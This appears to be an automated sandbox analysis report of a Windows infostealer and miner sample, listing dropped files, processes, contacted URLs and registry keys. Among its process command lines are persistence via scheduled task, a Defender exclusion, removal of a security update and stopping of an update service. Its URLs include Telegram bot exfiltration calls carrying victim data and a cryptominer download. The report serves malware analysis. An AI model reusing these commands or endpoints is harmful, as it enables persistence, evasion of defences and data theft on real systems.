Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\hgzxhw.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ohvrxt.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\spczxf.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\utntwb.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
modified
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x1a0db5ff, page size 16384, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_0WDZX0ZOOI1PRRIF_df62f32ee59d7ca897a8574ee9a18acb4a2a97_0c92175c_394f91dc-ad3c-4d96-9ece-ab7189c2220a\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hgzxhw.exe_b7faaa96a846ed7b3f62e65dfab6c1e486782f_1d9feab2_19c46456-23aa-4aef-ace5-ed965f2d70af\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ohvrxt.exe_86725fff1ed7b180dee641e5a46ef7a46642c8a_4c771ea2_ad54622c-237f-402d-82fe-00fa4d7c783d\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_spczxf.exe_e579793d450d0c282ac383c29839632381b814_0d30f733_8509e221-ac0f-4a90-ad7f-f26b5a2b819d\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_utntwb.exe_35733fcd6311bab2ecb571498494acca9c46d7_768da9df_56c226de-60c0-45e9-9413-a7b3279b6080\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A76.tmp.dmp
|
Mini DuMP crash report, 16 streams, Thu Mar 28 09:25:29 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C5C.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C9B.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CB8.tmp.csv
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D17.tmp.txt
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A1F.tmp.dmp
|
Mini DuMP crash report, 16 streams, Thu Mar 28 09:26:42 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4BE5.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C34.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C55.tmp.csv
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C95.tmp.txt
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER696F.tmp.dmp
|
Mini DuMP crash report, 16 streams, Thu Mar 28 09:26:51 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FA9.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FD9.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FED.tmp.csv
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER703C.tmp.txt
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER85A6.tmp.dmp
|
Mini DuMP crash report, 16 streams, Thu Mar 28 09:25:53 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BD1.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BF1.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C01.tmp.csv
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C50.tmp.txt
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER95BE.tmp.dmp
|
Mini DuMP crash report, 16 streams, Thu Mar 28 09:27:03 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D12.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D33.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D58.tmp.csv
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DA7.tmp.txt
|
data
|
dropped
|
||
C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock,
0x1 compression
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\msbuild.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\ServiceHub\msbuild.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clt0zb5m.tew.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ii40d0gv.52f.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1rhrphd.bpp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2g2xhwy.jqz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\tc.txt
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 44 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
|
||
C:\Users\user\AppData\Local\Temp\spczxf.exe
|
"C:\Users\user\AppData\Local\Temp\spczxf.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe
|
"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe"
|
||
C:\Users\user\AppData\Local\Temp\ohvrxt.exe
|
"C:\Users\user\AppData\Local\Temp\ohvrxt.exe"
|
||
C:\Users\user\AppData\Local\Temp\hgzxhw.exe
|
"C:\Users\user\AppData\Local\Temp\hgzxhw.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
/rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
|
||
C:\Windows\SysWOW64\PING.EXE
|
ping 127.0.0.1
|
||
C:\Users\user\AppData\Local\Temp\utntwb.exe
|
"C:\Users\user\AppData\Local\Temp\utntwb.exe"
|
||
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f
|
||
C:\Users\user\AppData\Local\ServiceHub\msbuild.exe
|
"C:\Users\user\AppData\Local\ServiceHub\msbuild.exe"
|
||
C:\Users\user\AppData\Local\ServiceHub\msbuild.exe
|
C:\Users\user\AppData\Local\ServiceHub\msbuild.exe
|
||
C:\Program Files\Windows Media Player\wmplayer.exe
|
"C:\Program Files\Windows Media Player\wmplayer.exe"
|
||
C:\Program Files\Windows Media Player\wmplayer.exe
|
"C:\Program Files\Windows Media Player\wmplayer.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData)
-ExclusionExtension '.exe' -Force
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
|
||
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop UsoSvc
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k WerSvcGroup
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -pss -s 384 -p 432 -ip 432
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 432 -s 1216
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -pss -s 544 -p 2908 -ip 2908
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 2908 -s 3156
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -pss -s 496 -p 1384 -ip 1384
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 1384 -s 1200
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -pss -s 544 -p 3660 -ip 3660
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 3660 -s 3136
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -pss -s 476 -p 5788 -ip 5788
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 5788 -s 3120
|
||
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 36 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
104.194.9.116
|
|||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdData
|
unknown
|
||
http://Passport.NET/tb_S
|
unknown
|
||
https://api.telegram.org
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
|
unknown
|
||
http://schemas.xmlsoap.org/soap/envelope/
|
unknown
|
||
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/ResolveUser.srf
|
unknown
|
||
https://login.microsoftonline.com/MSARST2.srf
|
unknown
|
||
http://Passport.NET/STS
|
unknown
|
||
http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
|
unknown
|
||
http://Passport.NET/tbpose
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
|
unknown
|
||
https://api.telegram.org/%t
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/scToken
|
unknown
|
||
https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0iSrrh-e2fE/sendMessage?chat_id=6585536474&text=User%205814831126857437469%20ran%20the%20malware
|
149.154.167.220
|
||
https://api.telegram.org/
|
unknown
|
||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdt
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels
|
unknown
|
||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdss
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
|
unknown
|
||
https://account.live.co
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
|
unknown
|
||
http://Passport.NET/tb
|
unknown
|
||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
|
unknown
|
||
https://account.live.com/InlineSignup.aspx?iww=1&id=80502
|
unknown
|
||
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0iSrrh-e2fE/sendMessage?chat_id=65855
|
unknown
|
||
https://signup.live.com/signup.aspx
|
unknown
|
||
http://Passport.NET/tb_
|
unknown
|
||
https://api.telegram.org/bot6389892231:AAEdDUVYYFJmNDGihmXB4rLw0
|
unknown
|
||
https://login.microsoftonline.com/MSARST2.srf=
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80601
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80600
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80603
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/scs-cbc
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/09/policy
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80605
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80604
|
unknown
|
||
https://account.live.com/msangcwam
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
|
unknown
|
||
http://passport.net/tb
|
unknown
|
||
http://upx.sf.net
|
unknown
|
||
https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845&text=%E2%98%A0%20%5BXWorm%20V5.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB83F65D83688BE31381B%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20UZK6EYLC%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20pdr326
|
149.154.167.220
|
||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
|
unknown
|
||
https://account.live.com/Wizard/Password/Change?id=80601
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/sc
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80601
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80600
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
|
unknown
|
||
https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuef
|
unknown
|
||
https://login.ecur
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80605
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80603
|
unknown
|
||
https://account.live.com/inlinesignup.aspx?iww=1&id=80604
|
unknown
|
||
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
|
unknown
|
There are 62 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
wmploc.dll
|
unknown
|
||
api.telegram.org
|
149.154.167.220
|
||
fp2e7a.wpc.phicdn.net
|
192.229.211.108
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
104.194.9.116
|
unknown
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\jsc_RASMANCS
|
FileDirectory
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
ProgramId
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
FileId
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
LowerCaseLongPath
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
LongPathHash
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
Name
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
OriginalFileName
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
Publisher
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
Version
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
BinFileVersion
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
BinaryType
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
ProductName
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
ProductVersion
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
LinkDate
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
BinProductVersion
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
AppxPackageFullName
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
Size
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
Language
|
||
\REGISTRY\A\{12788d28-0d8a-773e-36ef-1eba6a85e273}\Root\InventoryApplicationFile\securiteinfo.com|b9fdfece81f87849
|
Usn
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\B68D8F953E551914324E557E6164D68B9926650C
|
Blob
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qtltntcbrequaj
|
Reason
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qhqkdfqhdepedo
|
DeviceId
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02qhqkdfqhdepedo
|
Provision Thursday, March 28, 2024 10:25:39
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qhqkdfqhdepedo
|
AppIdList
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
URL
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
Name
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
P3P
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
Flags
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02psbtbqujhpqftm
|
Request Thursday, March 28, 2024 10:25:45
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02psbtbqujhpqftm
|
Response Thursday, March 28, 2024 10:25:45
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02psbtbqujhpqftm
|
Reason
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jhspajbkplugms
|
DeviceId
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jhspajbkplugms
|
AppIdList
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
